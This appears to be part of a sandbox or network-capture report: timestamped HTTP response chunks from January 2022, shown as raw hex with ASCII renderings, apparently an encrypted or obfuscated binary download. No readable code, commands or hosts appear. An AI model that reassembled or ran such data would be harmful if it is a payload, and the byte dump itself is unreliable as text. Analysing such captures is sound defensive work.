                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7150INData Raw: 7a 62 7e 6c 4f 36 27 11 71 5a 5a 50 66 6b db 74 72 61 ef 70 4c 61 5d 69 35 30 60 35 33 4f 6e 67 71 42 77 76 49 44 c7 72 6a 67 a9 4a 4e 41 24 34 35 31 4e 4d 70 50 75 72 6f 33 64 37 74 30 97 49 73 61 c6 57 47 59 6c 72 32 32 7f 46 54 00 69 61 7a 6f 75 54 4c 70 46 64 54 6c 73 34 66 6d 09 58 58 50 6c 6b 49 75 72 61 43 70 4c 61 63 6b 33 30 6c 35 4d 4d 6e 67 f5 40 77 76 4a 44 74 72 68 67 30 4a 55 71 6f 36 8e 31 4d 4d 5f 50 77 63 70 3d eb 08 74 30 30 6c a3 6e 70 56 43 71 08 70 32 38 02 7c 54 00 63 6b 7e 00 55 54 4c 7a 71 1a 49 6c 4f 3c 6a 6a 1e 31 58 50 6c 70 c4 4a 72 61 42 55 9c 88 63 6b 31 18 55 35 33 45 1d 5d 71 42 7d 5e 76 44 74 78 46 49 37 24 6d 41 68 3c 22 bc 71 4d 70 51 52 64 74 bf 59 37 74 31 14 99 9a 61 71 52 6f 60 31 70 38 41 4b 46 54 0a cb 76 15 21 77
                                                                                                                                                                                                    Data Ascii: zb~lO6'qZZPfktrapLa]i50`53OngqBwvIDrjgJNA$451NMpPuro3d7t0IsaWGYlr22FTiazouTLpFdTls4fmXXPlkIuraCpLack30l5MMng@wvJDtrhg0JUqo61MM_Pwcp=t00lnpVCqp28|Tck~UTLzqIlO<jj1XPlpJraBUck1U53E]qB}^vDtxFI7$mAh<"qMpQRdtY7t1aqRo`1p8AKFTv!w
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7166INData Raw: 4e 41 92 15 35 31 68 4d 7d 50 26 72 ee 33 76 37 4e 02 31 49 7a 61 7c 56 12 59 b0 71 22 32 c3 7b 54 00 60 61 77 6f 2e 54 4d 70 6a 64 9e 5c 4f 36 6f 6d 7c 5a 05 50 e7 6a 59 75 28 4a 43 70 45 61 6d 6b 4d 30 6f 14 23 4f 9c 7e 71 42 7e 76 47 44 0e 72 eb 66 30 4b 1d 7b 68 36 3c 31 5d 4d 0d 50 76 72 7f 32 50 06 74 30 49 49 66 61 0f 56 44 58 21 70 ac 33 71 46 5d 00 7c 61 e2 6f f4 55 5c 70 2a 75 54 6c 46 36 70 6d ea 5a 59 50 76 6b 6e 44 72 61 3b 70 54 61 f8 6b 36 31 7c 35 ad 4e 6e 67 78 42 6f 76 fc 44 f7 73 7a 67 60 5a 4e 41 61 36 2c 31 f5 4d 71 51 77 72 c5 08 66 37 51 30 2a 49 cb 61 f0 56 57 59 f3 52 32 32 78 46 4f 00 d5 61 fb 6e 67 54 60 31 7a 64 5d 6c 52 36 a4 6d f0 5b 48 50 20 5b 49 75 7b 61 5e 70 8f 61 e2 6a 25 30 92 12 33 4f 67 67 6c 42 b3 76 c8 45 64 72 da
                                                                                                                                                                                                    Data Ascii: NA51hM}P&r3v7N1Iza|VYq"2{T`awo.TMpjd\O6om|ZPjYu(JCpEamkM0o#O~qB~vGDrf0K{h6<1]MPvr2Pt0IIfaVDX!p3qF]|aoU\p*uTlF6pmZYPvknDra;pTak61|5NngxBovDszg`ZNAa6,1MqQwrf7Q0*IaVWYR22xFOangT`1zd]lR6m[HP [Iu{a^paj%03OgglBvEdr
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7182INData Raw: 5a 4f d9 2f 87 6c d1 68 82 56 87 6a 9a 5b c9 78 c2 72 62 49 b8 72 b4 32 5f 2a 7a 5c 8f 66 0b 60 9a 6f a8 45 2c 55 9c 7e d1 4a 0b 69 96 2f d4 30 97 70 73 4a 96 73 37 15 6f 2d 95 31 74 61 71 64 48 54 62 71 05 6a 93 30 94 4c 04 1a 78 63 45 48 2a 4e 75 74 0a 57 38 76 76 32 7e 4b f9 5d 61 54 2f 54 c1 72 33 65 9d 4d 3e 7b 22 6f af 0b 17 2f 7a 4b 1e 54 7b 42 3e 72 73 64 18 68 53 63 40 78 44 41 51 32 53 70 a0 49 49 54 f1 52 82 36 2f 33 e5 29 28 5d 5a 63 c0 60 cc 43 70 74 ec 0f e3 5c 05 04 97 4b e3 75 26 50 5f 5b e5 7e 05 68 ee 1f c0 77 b8 5a 28 63 b6 6a 28 71 e7 40 e8 6a 1d 65 aa 42 82 2a 88 35 43 7c 64 67 fd 43 15 45 f3 40 e0 73 2f 5a 97 4f aa 41 cf 2c ff 20 24 49 00 63 81 68 ee 30 a1 10 70 2b 40 4d 03 52 7a 4d 36 5d e2 57 27 29 e8 42 4c 1d b3 67 93 6f 07 67 46
                                                                                                                                                                                                    Data Ascii: ZO/lhVj[xrbIr2_*z\f`oE,U~Ji/0psJs7o-1taqdHTbqj0LxcEH*NutW8vv2~K]aT/Tr3eM>{"o/zKT{B>rsdhSc@xDAQ2SpIITR6/3)(]Zc`Cpt\Ku&P_[~hwZ(cj(q@jeB*5C|dgCE@s/ZOA, $Ich0p+@MRzM6]W')BLgogF
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7198INData Raw: 68 50 5c 5d 28 23 11 3d 12 72 2b 53 12 52 20 59 5c 2c 73 06 14 22 18 1a 43 15 53 46 18 29 3a 54 00 0c 1f 6f 36 24 3c 15 14 00 18 05 21 53 66 0a 14 2e 07 1e 03 1c 05 1c 1c 04 43 33 23 0c 01 02 5b 55 6c 79 5c 2c 0f 0b 3c 23 14 1e 20 2a 11 72 2e 06 44 2a 1e 33 07 42 50 52 39 24 1f 3e 24 11 00 42 03 37 10 51 45 28 23 13 1e 22 22 3a 45 19 5d 5c 22 25 3b 70 0c 61 35 1f 12 26 2d 04 13 0b 3a 2f 20 58 12 08 09 2e 0b 33 09 1b 2c 75 02 12 39 32 20 0e 01 3f 4c 40 09 35 70 27 0f 09 16 27 23 0f 39 21 74 24 0b 0b 45 2e 1a 38 18 53 35 7c 28 3e 03 31 10 17 2c 40 03 53 11 5e 45 20 12 0d 25 2f 37 3c 31 03 57 46 2e 05 38 69 0c 0f 0e 2c 05 31 28 15 14 10 3d 0d 23 62 1f 1d 14 5a 0b 35 05 1e 3b 1c 06 18 13 02 23 15 0c 08 5a 5c 38 4c 43 2a 6e 20 14 36 23 0f 39 21 74 15 0f 13 6f
                                                                                                                                                                                                    Data Ascii: hP\](#=r+SR Y\,s"CSF):To6$<!Sf.C3#[Uly\,<# *r.D*3BPR9$>$B7QE(#"":E]\"%;pa5&-:/ X.3,u92 ?L@5p''#9!t$E.8S5|(>1,@S^E %/7<1WF.8i,1(=#bZ5;#Z\8LC*n 6#9!to
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7214INData Raw: 5f 32 66 6c 7c 58 59 51 65 6b 49 69 76 61 43 6d 49 67 63 6a 28 35 7e 4c 36 6f 6c 6f 69 4a 7e 56 4d 56 5d 6a 62 75 1d 57 4b 61 69 3e 27 18 49 4b 61 d0 87 76 65 32 66 37 70 45 31 49 73 75 77 43 55 64 30 65 20 b2 f0 43 46 45 7b e1 ff 73 6b 46 cc f9 6c 62 41 7e 72 37 73 7f f1 d7 5d 42 23 79 c9 e4 63 e1 d6 61 cc f4 7f 6d 35 31 6e 27 b3 d6 6d 67 71 4c 72 76 4b 4a 7a 7a 6e 61 22 cb b2 46 6e 23 27 28 4f 43 72 59 71 67 7d 2b 64 25 f4 ad 33 4f 53 60 73 44 c7 c4 35 70 33 2a 7f 43 54 02 71 79 74 69 67 55 4d 6e 7a 7c 51 6c 4f 24 e6 cc 78 5a 58 45 74 66 48 67 f3 35 4a 70 4c 74 71 66 34 22 ed 6d 34 4f 6e 72 63 4f 76 78 40 44 76 67 78 6a 31 45 40 4f 6c 30 27 b0 45 44 76 45 65 6b 6d 20 e6 92 7a 36 11 48 7d 73 f1 f3 44 79 31 7e 31 1a 71 48 5c 06 7c 73 6b 6e 65 d5 50 78 7c
                                                                                                                                                                                                    Data Ascii: _2fl|XYQekIivaCmIgcj(5~L6oloiJ~VMV]jbuWKai>'IKave2f7pE1IsuwCUd0e CFE{skFlbA~r7s]B#ycam51n'mgqLrvKJzzna"Fn#'(OCrYqg}+d%3OS`sD5p3*CTqytigUMnz|QlO$xZXEtfHg5JpLtqf4"m4OnrcOvx@Dvgxj1E@Ol0'EDvEekm z6H}sDy1~1qH\|sknePx|
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7230INData Raw: 32 22 00 e7 9e 98 93 e0 05 f0 0d 00 04 58 aa af 03 5a 0f ff 00 d1 48 8a 86 41 26 2e 05 00 79 0b e8 4f 4e 5f dc 67 07 a1 08 e9 a3 27 00 cb cc c8 1d 1c c9 d7 cf 05 cd ce db 0e df d9 00 da dc dd de df 1c e0 e1 e3 c0 e4 59 e5 58 0a 50 00 52 51 2e 88 83 b8 4c bc 3e 5a 54 80 b2 31 46 c0 65 c9 50 00 44 1e 8f 80 25 15 10 0f 7f 05 1d d2 8b 88 41 11 89 90 4d 06 40 85 21 cb f5 00 c6 fd d7 80 16 39 f7 77 00 13 74 2f 96 29 03 78 2a 03 f3 a5 ff 81 83 e1 c8 dd a4 21 1c 31 87 74 40 0e fc 43 7c 0f a5 00 05 19 11 fd 35 1a 86 cb 24 06 66 1f 30 22 98 0c 12 0f 81 c4 04 f0 e7 50 99 83 01 eb 97 f2 8a 03 43 7b f7 00 3c 20 76 f5 0e 80 3b 22 75 21 0b 30 7b 01 21 40 60 c6 13 00 02 eb e6 4f 5f 25 ec fa 00 1c 1b 7c 43 06 05 88 14 02 04 40 56 24 13 84 c1 54 d0 d4 f0 dc 76 58 00 29 08
                                                                                                                                                                                                    Data Ascii: 2"XZHA&.yON_g'YXPRQ.L>ZT1FePD%AM@!9wt/)x*!1t@C|5$f0"PC{< v;"u!0{!@`O_%|C@V$TvX)
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7246INData Raw: d0 74 7b 40 e2 00 f2 63 c2 0a e9 f1 5e 07 03 03 a1 0e eb 5f 9d a1 51 d8 eb fb fc f9 7c 60 60 4d 80 16 7d 9e 75 00 7c ba f8 1d 89 b9 00 05 55 98 db e3 6a b1 e1 f4 2a fe 8c 01 5f 2b 03 8d 93 15 14 d7 9b 75 bb 0b 98 19 21 4a 00 01 eb 13 60 1a e1 77 34 00 66 88 0a 46 f4 25 84 c0 1f 74 df 69 80 3b ea ac c4 67 37 75 70 00 51 06 fe b8 58 0c e9 2f 0e 0a 8b 2c fd ef 24 20 e8 13 82 01 7e 03 1c 81 ed e3 3d 50 f7 20 55 2f 08 52 00 89 2e 32 6c 9f fc 26 b1 1e 29 30 c9 40 9d e1 b6 d4 8d 62 00 7f f8 d8 4b 31 e2 e6 97 f2 b0 4c 55 dd 1f 14 91 c0 89 0c 85 17 93 08 75 10 00 de ca 79 03 66 bb 43 88 00 e4 54 aa 2a 49 b9 4e 22 b8 ce 00 75 28 68 be 0b ea 0c 72 00 77 aa b1 40 2c 80 29 1e 01 27 91 16 83 70 7b 04 d8 61 2a 7a 48 00 94 7a 96 3d 43 02 23 01 74 c4 03 39 22 bc f2 34 a2
                                                                                                                                                                                                    Data Ascii: t{@c^_Q|``M}u|Uj*_+u!J`w4fF%ti;g7upQX/,$ ~=P U/R.2l&)0@bK1LUuyfCT*IN"u(hrw@,)'p{a*zHz=C#t9"4
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7262INData Raw: 0e 28 22 3f 5f 6e c0 e8 93 7a a4 16 a5 00 7d 31 94 89 30 6b 55 3d 00 8b 43 73 f4 44 51 0f ae 00 ba 10 c8 fd 6c 14 20 48 00 81 4c 09 e2 13 d4 08 50 fe 54 07 9e 21 3d 40 58 f5 5c 4f 0f 60 e8 64 47 68 f4 6c 33 70 fa 74 11 78 fd 7c 10 d7 82 df 00 bd f6 49 87 8b 47 44 d0 00 c2 c1 c8 07 98 b1 ea ca 71 12 7c 31 00 03 b7 d8 80 78 8f 8c 4c 00 f2 fe ce 50 11 14 13 f8 7e d6 74 f3 58 3c 90 3f 1d 00 03 49 64 01 02 0d 87 fe a4 16 36 48 78 0e 30 81 80 7c a8 29 6a f9 7d b8 f4 68 0f 88 84 64 4c c3 44 28 81 e0 4e af 39 fc 62 3a 21 48 1c 6c 88 40 64 50 78 7d 81 84 1f 0b c8 9b 5f 4c 40 70 44 8c 32 54 3c 3c 40 b6 95 85 e4 a1 7d 00 74 22 90 19 58 1e 20 ef 00 42 8c f1 0d fa a8 c4 39 f0 78 00 21 94 91 5c e0 28 82 b8 f4 90 00 f2 46 04 58 22 7c 11 98 06 0c 60 8f 10 61 2e 00 79 7f
                                                                                                                                                                                                    Data Ascii: ("?_nz}10kU=CsDQl HLPT!=@X\O`dGhl3ptx|IGDq|1xLP~tX<?Id6Hx0|)j}hdLD(N9b:!Hl@dPx}_L@pD2T<<@}t"X B9x!\(FX"|`a.y
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7278INData Raw: 42 8d e3 f2 de 91 f0 80 f7 d9 01 8b 14 8f 33 73 54 64 20 f4 20 16 43 34 d1 00 84 bc 03 40 41 75 60 e8 cc d4 e4 3c 50 00 27 81 ec 56 9c 84 89 e7 00 b9 ff 43 4e 8d 70 10 99 1e 76 40 da 40 f5 06 6c 8e 0f ca 7b 89 3d c1 52 01 e8 bb 91 34 96 b0 d0 22 9c 16 06 8e 5e 00 6d 4e cf 16 56 01 00 1e 7e 10 0f c8 c9 cb d1 e6 bc ff c0 cf 89 00 d6 31 ce 21 de 1d 03 3c 02 24 fc 81 c1 cb 02 c0 24 37 3f 07 e4 16 89 7c c6 50 05 3b 01 f7 00 87 ce 31 de 21 b5 03 58 00 d3 48 c1 c8 c4 3a 94 32 e2 fe 00 11 f2 dc de 31 ee 21 f6 00 03 bd 78 5b c6 4a c1 cf 00 3a 7f 8c 86 42 d6 37 f1 00 82 e3 fe 21 d8 03 5c 24 30 63 0c 2a ca 10 3a 00 9c 33 c8 ce 46 f3 82 cf 01 d8 21 69 03 63 c4 18 8b 28 c9 3a 0c 78 52 de 03 2b f0 90 ad 5e 81 b0 91 d1 18 0e 1c 16 87 44 80 72 0e 1d 11 20 0f c8 1e 74 e3
                                                                                                                                                                                                    Data Ascii: B3sTd C4@Au`<P'VCNpv@@l{=R4"^mNV~1!<$$7?|P;1!XH:21!x[J:B7!\$0c*:3F!ic(:xR+^Dr t
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7294INData Raw: a1 b1 0a 0c f0 38 6c 00 25 1a 8d 93 0b 7f 79 78 00 82 c7 e8 7b 09 a0 20 0f 06 6a 10 8d 50 83 5f 7f 57 00 9b be 26 42 85 30 71 d8 00 04 c6 40 0a fb c8 7f 10 01 a1 05 14 9c 1c 08 33 c8 09 86 70 30 01 58 f6 be ef 6e d2 42 30 2f b6 00 f0 27 d5 71 b8 e3 da ee 00 df 0f 65 56 f1 e5 e0 61 0e 9e ca 2a 64 00 1c 85 a1 92 d9 07 27 43 cd fc c8 00 2e b7 9c 8e 13 55 ec e6 00 d7 c6 99 e9 af fa 1c f3 ef 61 00 5d 47 c3 a0 de ae 01 ea 4d f6 79 3b f8 e6 c0 01 6c 07 6d 37 78 bc 5c 00 c4 c3 88 42 26 5b 96 ba 00 07 5a 4e 62 73 58 00 a0 f7 fe 76 8f e2 b2 01 00 6d 98 90 d3 a9 ab 4c e0 38 f5 9a 00 dc 99 8b 32 77 33 8f 00 de 18 73 4e 45 c4 12 8e e0 e4 00 fa 04 71 f3 86 78 c5 0f 00 ec 6c 50 46 c0 d0 10 99 2e 63 37 b2 00 18 b7 08 49 66 dd 00 1f 01 97 22 3d cc b4 38 0e a6 c0 16 a7 00
                                                                                                                                                                                                    Data Ascii: 8l%yx{ jP_W&B0q@3p0XnB0/'qeVa*d'C.Ua]GMy;lm7x\B&[ZNbsXvmL82w3sNEqxlPF.c7If"=8
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7310INData Raw: 69 c8 23 04 b8 84 99 8a 78 06 00 7c 5d 11 08 f6 c2 3b d9 fb 80 ae b5 4a ee cd ec 91 07 0c 13 17 8e 36 c5 6d 07 cf 94 d5 77 24 70 01 f8 e9 42 2e aa c8 ca 00 86 0f 84 f7 c5 90 7a 08 1f 10 e1 49 00 0c 0d 19 18 f1 15 00 20 2a 6b 46 81 5f e5 c8 03 ec c5 16 83 e0 0f 80 34 09 77 0b 06 f6 43 05 00 b9 74 3f 89 bb 0e 16 24 27 2d a0 1c 3e 17 83 c5 09 06 8b 4f 5b 80 17 0a 46 a1 32 f6 a8 01 5c 20 c7 68 64 10 3c e4 31 25 00 f0 1d 3d 90 8a 0b 77 0e 00 46 70 74 14 cb ae 60 15 00 a7 6f f4 a6 25 e1 aa 68 07 ac c1 0b cd 89 13 22 8b b8 30 07 b2 16 01 b3 a2 00 6b 82 83 4b 2e 40 38 d7 5a 00 ac 0e 43 08 94 ec fb 2c 23 ed 8b 03 ff 21 9f d1 b8 0a f9 68 00 a7 4a ef 65 1f a0 a8 23 00 b4 dd 25 d6 0c 5a 62 9a 4a d3 f0 99 50 00 a6 9d 26 7c 65 cf bc 43 07 a5 eb 20 73 29 60 56 c2 0d 50
                                                                                                                                                                                                    Data Ascii: i#x|];J6mw$pB.zI *kF_4wCt?$'->O[F2\ hd<1%=wFpt`o%h"0kK.@8ZC,#!hJe#%ZbJP&|eC s)`VP
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7326INData Raw: 49 5e 58 b9 9c 73 10 0a 00 5c 26 60 09 42 eb 51 8d fc 7e 7d f3 00 3c 18 e0 69 8a 46 95 54 f8 11 00 06 3e 13 a8 5c 1e 43 6c 3d ca 4b 87 10 9c f2 3a 59 80 05 2e 29 b4 e5 00 c3 db 32 17 04 19 3c b3 3c 46 bb 01 e2 27 18 f9 a2 5a 60 b6 71 00 8b 43 79 04 31 78 ca 4c 92 03 01 58 4d 32 76 13 61 47 dc 2e 7c 90 00 03 39 36 d8 cd 6a 1b b8 5f b5 b6 00 8e 3e a5 04 5a 4d 58 8f 00 d4 e2 05 29 0a d3 93 cb f4 bf 01 12 15 4c 1a 46 b3 50 30 e2 e9 1d 0d 25 bc 03 54 ea 13 dc 80 40 05 03 00 80 78 84 22 10 01 3e 50 00 07 df f0 d2 09 bd 70 d7 98 17 00 e9 35 0a 61 1d 78 20 7a 0f 58 42 1a c6 80 44 29 9f 72 01 e3 30 f3 fa 9d 78 54 00 bd 68 2e 82 95 73 19 06 7c 9b 00 44 af c3 89 d4 11 29 1a 1f 18 e5 cc d3 f6 0e 08 ce be 41 90 50 51 88 8f 30 57 42 01 b8 f0 e8 e1 4c f3 1c 30 00 75 3c
                                                                                                                                                                                                    Data Ascii: I^Xs\&`BQ~}<iFT>\Cl=K:Y.)2<<F'Z`qCy1xLXM2vaG.|96j_>ZMX)LFP0%T@x">Pp5ax zXBD)r0xTh.s|D)APQ0WBL0u<
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7342INData Raw: 5e 1e fa 6c 3a d4 d9 1f ea b8 80 18 8a 85 a1 ed 84 77 c0 00 8d 7e 0c 0a 75 13 97 fd 00 91 f6 54 2a 81 dc 85 b5 00 83 31 ff d2 eb 10 29 27 28 07 12 f8 00 4a 97 44 fb dd 38 92 91 07 f2 05 ad ee 0a 10 29 47 e4 0c 39 54 85 00 86 87 91 56 92 09 18 00 80 77 ca 39 ff fa 2b 44 00 4c 90 93 e8 12 d9 20 ea f4 d3 00 0f e2 b6 3e 40 03 b2 74 02 79 87 19 d6 6e c9 80 be c2 27 0c 48 03 ba 03 75 7f 50 da c0 45 aa 9a 00 22 e5 d2 ee 32 21 f0 e8 1c 26 74 0d c0 8b ce 06 64 7f 22 f9 40 d8 fd 28 f7 13 2b c6 5a 00 55 92 0b 19 04 1b 03 94 2c a2 be 31 05 d7 57 ea 50 06 0a f0 f8 90 04 00 55 0c c9 20 51 6c 56 87 00 2b 2f d5 f7 11 59 c8 7e 00 cd 66 55 c2 39 3b 3f 28 00 d0 d8 f4 73 4e 0c aa c8 00 dd 5c 48 83 03 a2 d3 7d 0f 7e 54 59 f8 41 89 71 25 8d 20 e9 e4 00 14 26 8a 9f db 65 5d a8
                                                                                                                                                                                                    Data Ascii: ^l:w~uT*1)'(JD8)G9TVw9+DL >@tyn'HuPE"2!&td"@(+ZU,1WPU QlV+/Y~fU9;?(sN\H}~TYAq% &e]
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7358INData Raw: 52 74 05 03 64 42 57 90 54 22 30 3e 08 0a 77 28 b0 5f 12 a8 c1 72 33 62 ac 1e 91 a0 d3 2e 18 0f 94 b0 7e 11 f8 a4 84 04 78 23 00 6a 40 58 75 13 10 20 70 fe 6e 00 67 ae 5e 9a 74 57 64 60 75 b2 00 24 10 4e 0c b1 f8 c8 63 03 28 50 18 2a 22 08 c8 03 e8 94 00 57 04 64 29 14 10 05 54 07 6a 4c 7c 2b c8 b0 da 85 20 24 76 2a 3d c4 50 80 07 0b 54 14 68 d2 d8 f6 82 60 5a 22 b4 58 52 4c 04 10 cc 2c 19 3a c2 69 04 60 4e 91 ec 07 3e fc 65 59 2d 20 c4 11 02 74 00 4a fe e6 b8 ce 1d 08 94 14 72 06 50 a6 00 73 df 98 f2 aa cc 85 07 64 07 39 13 48 60 60 22 10 40 7a 05 00 43 6c 61 73 c7 99 38 24 74 58 00 74 2f 0f c5 49 26 71 03 fe 41 00 64 61 70 7b 5a 60 80 51 0e 01 34 2f 9c 9f c0 ec 52 d0 11 9e a6 00 c0 20 af 14 3d 82 da 37 3e a2 f0 60 16 60 25 74 80 fe e0 3b 09 72 80 30 ec
                                                                                                                                                                                                    Data Ascii: RtdBWT"0>w(_r3b.~x#j@Xu png^tWd`u$Nc(P*"Wd)TjL|+ $v*=PTh`Z"XRL,:i`N>eY- tJrPsd9H``"@zClas8$tXt/I&qAdap{Z`Q4/R =7>``%t;r0
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7374INData Raw: 8c 85 e0 08 ac 00 58 93 97 04 a4 32 c0 d4 00 42 c2 a0 19 49 8a bf 6c 00 7a 27 90 61 24 e0 d9 ea 37 e1 78 16 90 f0 52 38 b9 7c c9 00 74 54 1e b5 87 64 e9 41 1f 09 3c 1b 5f 4e 40 0c b2 f0 11 2c 3d 00 25 de 9d 45 96 a7 43 b6 e8 3e 00 a3 93 ae a2 16 d4 68 19 ee b0 00 30 02 40 27 41 84 1a ec 00 76 25 bd 85 4c 06 a0 20 1f 2c e8 55 00 bb f1 43 cd 7e 92 01 41 49 b0 f0 75 82 71 60 80 76 00 50 ba 62 5a 09 c2 9a a2 00 d6 8e 26 46 1c cf ac 40 fd c8 02 51 00 9c 13 21 c3 a2 8a a3 bf 00 b0 0b 31 61 e4 b4 9a 36 00 4f 04 0e 86 47 89 74 a7 00 26 ec a1 32 34 6d c9 ad 24 3b 0b 79 07 41 b0 d0 b0 12 1f 9d 87 00 32 e4 61 05 39 91 3a 0e 00 f2 e7 cb f7 71 24 17 1c 2e c2 1e 98 00 d0 18 cc d9 1d 3b 00 ff c9 c7 24 04 1c e4 2e 09 98 fd ed 97 80 68 4f c6 d0 cf 00 f5 cd 12 f1 c2 ca de
                                                                                                                                                                                                    Data Ascii: X2BIlz'a$7xR8|tTdA<_N@,=%EC>h0@'Av%L ,UC~AIuq`vPbZ&F@Q!1a6OGt&24m$;yA2a9:q$.;$.hO
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7390INData Raw: de 20 d9 b6 f8 a6 19 14 04 d3 21 3e 89 33 99 41 0b e9 38 3a 83 2c e8 26 16 e9 11 ca 46 7a 9d b8 c1 c1 82 4d af a0 19 e9 f9 03 12 52 7b 3e 79 88 09 eb f7 5c ee 77 c8 8e e3 a7 94 e2 e5 95 17 61 61 cb ea 2f a5 68 be a5 93 3a 61 7a 6f ff 24 4a c1 67 00 f2 98 c0 48 34 e0 3b aa a0 21 78 81 6f 10 76 ba 24 ca f9 25 9b 5a ad d9 a3 4c da 9c 7b d2 44 cc 19 df 86 62 14 47 eb ab fd 8a 26 83 8f e6 4d a8 f3 59 e9 c6 19 94 25 40 65 d5 7f f8 44 52 ee 7d 37 54 09 58 eb 02 16 98 fc 78 91 ff f9 75 6a dc 22 9d d1 b4 cb 63 95 e8 68 79 d8 19 55 81 d4 79 f1 02 30 cf f9 7f cb fc ac 66 3e 44 1d 27 7b 4a ef d3 e6 61 8e 43 0d b9 06 69 28 9e 05 73 f4 ae f9 5f 10 74 95 08 fe b9 d4 c4 8f 5b 30 9f ba 7b 9f 68 08 09 26 f6 e0 ce c5 6e 2c b8 8b ef dc 28 b0 5b b2 2a f5 3b a2 c9 04 b0 ca dd
                                                                                                                                                                                                    Data Ascii: !>3A8:,&FzMR{>y\waa/h:azo$JgH4;!xov$%ZL{DbG&MY%@eDR}7TXxuj"chyUy0f>D'{JaCi(s_t[0{h&n,([*;
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7406INData Raw: f9 83 23 86 a4 d4 76 6d 93 48 2d 20 ea 86 25 08 db ff 03 ad 2b b9 43 c4 ae 70 5e cc 40 0c 2a d0 fd 82 01 6a 17 3b b5 24 25 0f 4f 57 ad 3a ff 0c d1 9e 97 cd 7f 94 9a f2 d8 ac b0 50 97 a4 41 3c 95 15 66 3c 94 e5 34 ac 2c 19 41 6d ec b0 d6 aa cf 15 5a 2a 05 33 f1 ee b0 06 c8 ad 70 b2 eb 3c 74 56 d4 df 86 9d 9a f6 68 59 70 2f 46 a8 2c 92 f9 6b 72 14 fc 4f df 74 92 5e 14 6f 87 70 f3 5b c4 fd f7 87 fd 4c 62 a6 45 b2 02 87 2f 1c 78 c5 b7 9a 84 cf 35 46 46 f2 0f d0 5b ec cd ad f3 25 de f8 7d 71 1a f1 83 3f 22 f2 ff 7b 6d 36 a8 5a 47 73 7a 16 0d 95 b4 01 9a fb db ee fc c8 b7 ab 3c 70 72 5c a0 25 a5 91 10 21 07 b1 73 4c 8c 05 cc a5 72 58 fa f2 bd d1 97 6a 33 03 33 b3 b6 54 25 1d ed 6e a3 06 5f 15 10 2c ea 9f 1a 18 44 51 53 97 88 88 a3 bf 7f 52 77 15 ff 4b ce 8c ea
                                                                                                                                                                                                    Data Ascii: #vmH- %+Cp^@*j;$%OW:PA<f<4,AmZ*3p<tVhYp/F,krOt^op[LbE/x5FF[%}q?"{m6ZGsz<pr\%!sLrXj33T%n_,DQSRwK
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7422INData Raw: a2 66 0e c5 2c 03 e4 1b 65 df a0 56 bc b2 4e f4 da e6 4f 0d 5f 11 ec d6 06 97 cc 86 59 8a f9 8b d4 b7 5e 7d fa da d8 fe ab d1 af 00 4b b8 ff 6e 3b d2 f5 b8 70 ad 2b 81 56 c6 96 b9 07 1c 10 94 8a db 60 bf d0 5f 40 1d 38 81 90 dd 60 30 87 a8 19 49 e8 f5 1e d5 de 2a b5 f4 0b a4 b7 1b 09 fd e4 a7 36 21 12 3b 0c d8 2a 88 80 b3 b7 e8 c8 44 b5 44 e4 e5 41 76 7a 36 a0 a0 41 75 9a cc a5 e5 5d ed a2 e5 38 61 68 1b 15 52 e7 95 f0 63 ee b5 6a a1 29 3d 47 17 7b 9d 2c 52 2a a1 b2 35 50 81 1e 99 a5 37 a8 0f f1 af da e1 e2 8c 99 3b 5f 00 a4 1e bf 57 6b 93 e8 78 95 f5 d7 72 91 db d4 87 93 cd 6d 14 45 34 3a c9 77 2a 63 9e f6 6a 9e 15 38 ac 86 24 a7 55 34 13 42 63 1e 2e c6 c0 71 2b 02 5f cc 93 49 6e cc e2 ac b9 cd 7d c5 73 05 4e d5 6d de 9d 86 b2 4f 15 3d c3 86 d8 24 9f 39
                                                                                                                                                                                                    Data Ascii: f,eVNO_Y^}Kn;p+V`_@8`0I*6!;*DDAvz6Au]8ahRcj)=G{,R*5P7;_WkxrmE4:w*cj8$U4Bc.q+_In}sNmO=$9
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7438INData Raw: 24 30 85 ae 1a a2 67 54 92 e0 6f 78 2b 3f d9 46 64 40 5d 40 be 1c 75 f2 40 16 c1 ad 51 9b 54 c7 fe fb 01 5f 10 61 b5 4c 64 7d 74 f3 38 de 37 fc f3 18 50 00 b1 36 ab 0f 17 96 f4 61 4d 43 04 3c 7b e5 b1 cc 7a 2a d7 f1 81 29 98 bc 4c 4f ea 94 39 ac 5a a4 93 80 a5 ee 77 43 06 67 e6 4f b6 e2 c0 55 c5 ec 34 d3 73 82 4a b8 d8 46 eb 0f a9 06 58 d8 87 d9 6f 93 23 05 3d fb e9 6a b6 b6 22 fe c5 fc 92 0f 3e 46 c5 b0 b8 2d 90 9c ac 5e 82 5b d1 db 33 2c 81 06 94 ae 11 7d fe c3 e9 88 ff 51 1c 5e 90 93 95 2b e3 5a e2 ae f1 03 09 3c 00 6c 61 3a a9 63 b3 8e 3a 3f 63 8a 90 e3 47 8a e2 32 83 ad 0a 79 5a 0d ae f6 0f 2f 11 99 d8 64 53 df 7e 80 88 da f0 e1 d3 97 49 e2 18 6c fe 05 15 ca fc 42 07 55 81 e2 68 98 b9 bc b8 7c e5 62 83 07 9d 6a 7e 10 5a 98 21 76 33 fc f8 bc aa c8 47
                                                                                                                                                                                                    Data Ascii: $0gTox+?Fd@]@u@QT_aLd}t87P6aMC<{z*)LO9ZwCgOU4sJFXo#=j">F-^[3,}Q^+Z<la:c:?cG2yZ/dS~IlBUh|bj~Z!v3G
